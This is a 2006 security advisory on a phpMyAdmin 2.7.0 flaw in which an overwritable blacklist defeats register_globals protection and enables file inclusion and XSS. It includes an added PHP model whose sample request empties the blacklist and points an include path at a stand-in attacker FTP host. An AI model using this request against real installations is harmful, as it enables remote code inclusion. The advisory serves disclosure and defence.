[UNIX] phpMyAdmin Variable Overwrite Vulnerability
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 7 Aug 2006 11:38:11 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
phpMyAdmin Variable Overwrite Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.phpmyadmin.net> phpMyAdmin is "a tool written in PHP intended
to handle the administration of MySQL over the Web". A quick audit of the
variable overwrite protection that was redesigned for phpMyAdmin 2.7.0
revealed an easily exploitable flaw that defeats the protection completely
and thereby exposes phpMyAdmin to a number of XSS, local file inclusion
and remote file inclusion vulnerabilities.
DETAILS
Vulnerable Systems:
* phpMyAdmin version 2.7.0(-rc1)
phpMyAdmin comes with a register_globals emulation layer in
grab_globals.php, to stay compatible with hosts where register_globals is
turned off. This layer was heavily modified for the release of phpMyAdmin
2.7.0. One of the major changes is that the blacklist of variables that
the emulation layer may not overwrite is now stored in a global variable.
Unfortunately the variable name $import_blacklist is itself not covered by
the protection, so an attacker can overwrite the blacklist from the
request. Once the blacklist is overwritten, the attacker can, for example,
overwrite the $GLOBALS array with arbitrary content and exploit every
place where the $GLOBALS array is used.
During normal execution $GLOBALS is just another way to access global
variables, but once a script overwrites it, it becomes a normal variable
(with a few exceptions in PHP4). For more information about the unexpected
things that can happen when $GLOBALS is overwritten, see
<http://www.hardened-php.net/globals-problem>
In phpMyAdmin, $GLOBALS is used, for example, in the CSS generator to
access the global variable that stores the configuration. Because the
content of this variable is under the attacker's complete control, the
path of an included file can be injected. This leads to a remote URL
inclusion vulnerability on PHP5 and a local file inclusion vulnerability
on PHP4. The difference is that the PHP function file_exists() does not
work on URL wrappers in PHP4, but does work on ftp:// URLs in PHP5. (On a
host running our Hardening-Patch for PHP such a remote URL inclusion is of
course not allowed and is logged.)
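The following is an added illustration of the flaw described above; it is not code from phpMyAdmin or from the advisory author. A minimal register_globals emulation layer keeps its blacklist of protected names in a global that the layer itself can overwrite, exactly the structural mistake described. The $scope array stands in for PHP's global symbol table (phpMyAdmin wrote into the real one), theme_css_path() is a hypothetical stand-in for the CSS generator that derives an include path from the configuration, and the request array is constructed sample input, what PHP would build from a query string such as "?import_blacklist[]=&cfg[ThemePath]=ftp://...". The real bug was used to replace $GLOBALS, which PHP 4 and 5 allowed; here the simpler target $cfg shows the same loss of protection without depending on that version-specific behaviour.

```php
<?php
/*
 * Added illustration, not phpMyAdmin code. Models a register_globals
 * emulation layer whose blacklist can be overwritten from the request.
 * $scope stands in for PHP's global symbol table.
 */

/* Vulnerable layer: protects $cfg and friends, but not $import_blacklist. */
function grab_globals_vulnerable(array $request, array &$scope)
{
    $scope['import_blacklist'] = array('cfg', 'server', 'GLOBALS');

    foreach ($request as $name => $value) {
        // The check re-reads the global blacklist on every iteration. Once
        // the request has replaced it with an empty array, nothing is
        // protected any more, so a later key in the same request wins.
        if (in_array($name, $scope['import_blacklist'], true)) {
            continue;
        }
        $scope[$name] = $value;
    }
}

/* Fixed layer: the blacklist is a local that also names itself. */
function grab_globals_fixed(array $request, array &$scope)
{
    $blacklist = array('import_blacklist', 'cfg', 'server', 'GLOBALS');

    foreach ($request as $name => $value) {
        if (in_array($name, $blacklist, true)) {
            continue;
        }
        $scope[$name] = $value;
    }
}

/* Hypothetical stand-in for a CSS generator building an include path
 * from the configuration. With attacker-controlled $cfg this path is
 * attacker-controlled too (an ftp:// URL passes file_exists() on PHP5). */
function theme_css_path(array $scope)
{
    return $scope['cfg']['ThemePath'] . '/' . $scope['cfg']['Theme'] . '/css.php';
}

/* Constructed request: first empty the blacklist, then overwrite $cfg. */
$attack = array(
    'import_blacklist' => array(),
    'cfg'              => array('ThemePath' => 'ftp://attacker.invalid/x',
                                'Theme'     => 'original'),
);

$default = array('cfg' => array('ThemePath' => './themes', 'Theme' => 'original'));

$scope = $default;
grab_globals_vulnerable($attack, $scope);
echo "vulnerable: " . theme_css_path($scope) . "\n";

$scope = $default;
grab_globals_fixed($attack, $scope);
echo "fixed:      " . theme_css_path($scope) . "\n";
```

Run with the PHP command line interpreter; the first line shows the include path pointing at the attacker's host, the second shows the original theme path. Keeping the blacklist in a local (or, better, importing only from an explicit whitelist of expected parameter names) removes the ordering dependency entirely, since no request key can reach the variable the check relies on.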
Please also note that there are multiple (easy) ways to get PHP code into
files on the server, so local file inclusion vulnerabilities are more
dangerous than they seem. Additionally it is possible to directly include
PEAR.php from the installed PHP distribution. If it is one that shipped
with PHP <= 4.3.10, this can be used to execute code directly on the
server by manipulating the destructor list.
There are other places in phpMyAdmin where this vulnerability leads to XSS
and further local file inclusion vulnerabilities. They are not listed
separately, because the problem described above is already serious enough
to demonstrate the impact of the failing overwrite protection.
Disclosure Timeline:
6. December 2005 - Disclosed vulnerability to vendor
7. December 2005 - Release of new phpMyAdmin version
7. December 2005 - Public Disclosure
Recommendation:
It is strongly recommended to upgrade to the new version of phpMyAdmin,
which you can download at:
<http://www.phpmyadmin.net/home_page/downloads.php>
ADDITIONAL INFORMATION
The information has been provided by <mailto:sesser@xxxxxxxxxxxxxxxx>
Stefan Esser.
The original article can be found at:
<http://www.hardened-php.net/advisory_252005.110.html>
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.